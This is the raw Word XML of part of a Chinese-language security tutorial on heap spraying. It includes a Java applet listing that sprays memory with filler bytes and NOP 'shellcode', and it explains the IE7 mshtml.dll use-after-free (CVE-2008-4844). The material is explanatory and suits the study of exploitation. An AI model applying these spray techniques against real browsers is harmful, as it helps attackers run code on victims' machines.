    <w:p w14:paraId="1AE08EE6"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因为0x0c0c0c0c这个地址在内存中并不高</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>js分配内存就会影响到这一段，所以如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IE浏览器</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>之前访问了很多网页，特别是一些比较大的网页，就会影响到这段地址，从而导致Heap Spray失败。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D6C1E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而在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>中，可以有效的避免这个问题，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>分配内存的地址，本来就比</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>分配的地址要高。HeapSpray是一种思想，和用什么语言实现无关，所以我们可以选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>，也同样可以选择其他语言，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flash。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DAA007"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mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A1AA818" wp14:editId="1BAF9AB4">
                <wp:extent cx="5231081" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="8255" b="0"/>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081" cy="1404620"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4066B845"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hint="eastAsia"/>
                              </w:rPr>
                              <w:t>代码2</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00796185">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t>.8</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3FB7FDF7"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import java.io.*; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1096D0D6"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import java.applet.*; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="04D66EFF"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import java.awt.*; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="316CEA87"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public class myJavaHeap extends Applet </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3A6E183B"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 </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2CA46B72"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byte[] shellcode = new byte[] { (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3ABAD05A"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w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2BD7E1AA"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public void paint(Graphics g) </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="13F90FDA"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 </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="54E1D08C"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int heapBlockSize = 0x5000000; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="760A6718"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int heapSlidSize = 0x0100000; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0821F491"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byte[] buffer = new byte[heapBlockSize]; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="19B00112"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byte heapFilling = (byte)0x14; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1025D154"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for (int i = 0; i &lt; buffer.length; i ++) </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="15DC496D"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w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3EF9A022" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00796185" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:ind w:firstLineChars="405" w:firstLine="850"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00796185">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t xml:space="preserve">buffer[i] = heapFilling; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="09810169"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 </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="351FD071"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for (int i = 1; i &lt; 0x50; i ++) </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="208C5AD7"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 </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4385B123" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00796185" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:ind w:firstLine="851"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00796185">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t xml:space="preserve">for (int j = 0; j &lt; shellcode.length; j ++) </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7AE96D0B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00796185" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:ind w:firstLine="851"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00796185">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t xml:space="preserve">{ </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="68093D53" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00796185" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:ind w:firstLine="1276"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00796185">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t xml:space="preserve">buffer[i * heapSlidSize - shellcode.length - 0x1000 + j] = shellcode[j]; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="45827C95" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00796185" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:ind w:firstLine="851"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00796185">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t xml:space="preserve">} </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="39F23B64"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 </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1CDD4E50"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 </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="71120483"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w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                        <a:spAutoFit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="6A1AA818" id="_x0000_s1149" type="#_x0000_t202" style="width:41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5dFEgIAAP8DAAAOAAAAZHJzL2Uyb0RvYy54bWysk92O2yAQhe8r9R0Q943tNNlmrTirbbap&#10;Km1/pG0fAGMco2KGDiT29uk74Gw22t5V9QUCDxxmvjmsb8besKNCr8FWvJjlnCkrodF2X/Ef33dv&#10;Vpz5IGwjDFhV8Ufl+c3m9av14Eo1hw5Mo5CRiPXl4CreheDKLPOyU73wM3DKUrAF7EWgJe6zBsVA&#10;6r3J5nl+lQ2AjUOQynv6ezcF+Sbpt62S4WvbehWYqTjlFtKIaazjmG3WotyjcJ2WpzTEP2TRC23p&#10;0rPUnQiCHVD/JdVrieChDTMJfQZtq6VKNVA1Rf6imodOOJVqITjenTH5/ycrvxwf3DdkYXwPIzUw&#10;FeHdPcifnlnYdsLu1S0iDJ0SDV1cRGTZ4Hx5OhpR+9JHkXr4DA01WRwCJKGxxT5SoToZqVMDHs/Q&#10;1RiYpJ/L+dsiXxWcSYoVi3xxNU9tyUT5dNyhDx8V9CxOKo7U1SQvjvc+xHRE+bQl3ubB6GanjUkL&#10;3Ndbg+woyAG79KUKXmwzlg0Vv17Ol0nZQjyfzNHrQA41uq/4Ko/f5JmI44Nt0pYgtJnmlImxJz4R&#10;yQQnjPXIdEP6iV7kVUPzSMQQJkfSC6JJB/ibs4HcWHH/6yBQcWY+WaJ+XSwW0b5psVi+I0QMLyP1&#10;ZURYSVIVD5xN021Ilk883C11Z6cTt+dMTjmTyxLO04uINr5cp13P73bzBwAA//8DAFBLAwQUAAYA&#10;CAAAACEAiS9ayNsAAAAFAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3KgTI6oq&#10;xKkqJC6oB1o4cNzGS5wmtkPstOHvWbjQy0qrGc28Kdez68WJxtgGryFfZCDI18G0vtHw/vZ8twIR&#10;E3qDffCk4ZsirKvrqxILE85+R6d9agSH+FigBpvSUEgZa0sO4yIM5Fn7DKPDxO/YSDPimcNdL1WW&#10;LaXD1nODxYGeLNXdfnJcso31tAtfx3zbyQ/bLfHh1b5ofXszbx5BJJrTvxl+8RkdKmY6hMmbKHoN&#10;PCT9XdZW6p5nHDQolSuQVSkv6asfAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhADi7l0US&#10;AgAA/wMAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAIkv&#10;WsjbAAAABQEAAA8AAAAAAAAAAAAAAAAAbAQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAB0BQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="4066B845"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hint="eastAsia"/>
                        </w:rPr>
                        <w:t>代码2</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00796185">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>.8</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3FB7FDF7"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import java.io.*; </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1096D0D6"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import java.applet.*; </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="04D66EFF"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import java.awt.*; </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="316CEA87"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public class myJavaHeap extends Applet </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3A6E183B"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 </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2CA46B72"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byte[] shellcode = new byte[] { (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3ABAD05A"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w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2BD7E1AA"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public void paint(Graphics g) </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="13F90FDA"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 </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="54E1D08C"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int heapBlockSize = 0x5000000; </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="760A6718"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int heapSlidSize = 0x0100000; </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0821F491"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byte[] buffer = new byte[heapBlockSize]; </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="19B00112"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byte heapFilling = (byte)0x14; </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1025D154"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for (int i = 0; i &lt; buffer.length; i ++) </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="15DC496D"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w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3EF9A022" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00796185" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLineChars="405" w:firstLine="850"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00796185">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t xml:space="preserve">buffer[i] = heapFilling; </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="09810169"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 </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="351FD071"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for (int i = 1; i &lt; 0x50; i ++) </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="208C5AD7"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 </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4385B123" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00796185" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLine="851"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00796185">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t xml:space="preserve">for (int j = 0; j &lt; shellcode.length; j ++) </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7AE96D0B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00796185" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLine="851"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00796185">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t xml:space="preserve">{ </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="68093D53" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00796185" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLine="1276"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00796185">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t xml:space="preserve">buffer[i * heapSlidSize - shellcode.length - 0x1000 + j] = shellcode[j]; </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="45827C95" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00796185" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLine="851"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00796185">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t xml:space="preserve">} </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="39F23B64" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00796185" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLine="420"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00796185">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t xml:space="preserve">} </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1CDD4E50"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 xml:space="preserve">} </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="71120483" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00796185" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00796185">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>}</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E39FAD7"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编译后构造如下html：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41590331"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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ACEBA24" wp14:editId="27C7CD3F">
            <wp:extent cx="4804754" cy="1117021"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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5236" cy="1121783"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDC36A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 xml:space="preserve">以上的代码分配内存的地址，基本上在0x10800000 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x16000000 左右 所以选用的指令只能是0x11 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x15之间选择。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3129AC4A"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）IE7 Heap Spray利用原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C363E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IE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器作为IE浏览器历史上一次革命性的更新版本，IE7相比IE6在安全、网页浏览和用户体验上都有很大的增强。IE7增加了网络钓鱼过滤、支持选项卡浏览、支持非ASCII域名访问，加入了搜索引擎以便查找、支持PNG Alpha通道等众多新功能。但在IE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发布初期，就爆出高危的0day漏洞，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>CVE-2008-4844</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，该漏洞的利用原理即为Heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spray。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DB9624"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该漏洞是由于IE7.0中的mshtml.dll模块中在处理对象方面存在错误，能够造成内存管理混乱，通过构造特定条件代码可以导致内存溢出。攻击者可以通过构造畸形XML代码并且使用JavaScript脚本操作Shellcode去执行任意代码。该漏洞影响的操作系统为：Windows XP、Windows2003、Windows Vista，并且安装了IE7浏览器的用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731BB007"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MSHTML.DLL担负分配内存任务</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>它负责管理用于当前显示的页中HTML元素的内存空间的分配和回收。这个DLL在进程默认堆中分配内存空间，并且在当前页面被关闭，或者HTML 元素析构（destroy）时回收空间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083CEB4A"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CRecordInstance里面有一个Binding数组，里面都是CXfer *指针（通过CRecordInstance::AddBinding添加的）。调用 CRecordInstance::RemoveBinding的时候释放了CXfer对象指针，减小了数组大小，但被释放的指针还留在数组里面。调用 CRecordInstance::TransferToDestination遍历CXfer *数组，逐个调用CXfer::TransferFromSrc。问题是某个CXfer *元素在TransferFromSrc的时候竟然会调用CRecordInstance::RemoveBinding把后面的CXfer *给释放了。等遍历到后面的CXfer *，这个指针早已不再指向CXfer对象了，而被再次分配作它用，恰好指向了用户可控的网址，于是跳到了Heap Spray中去执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B3B58" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C0610E"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2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Heap Spray总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465837D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Heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
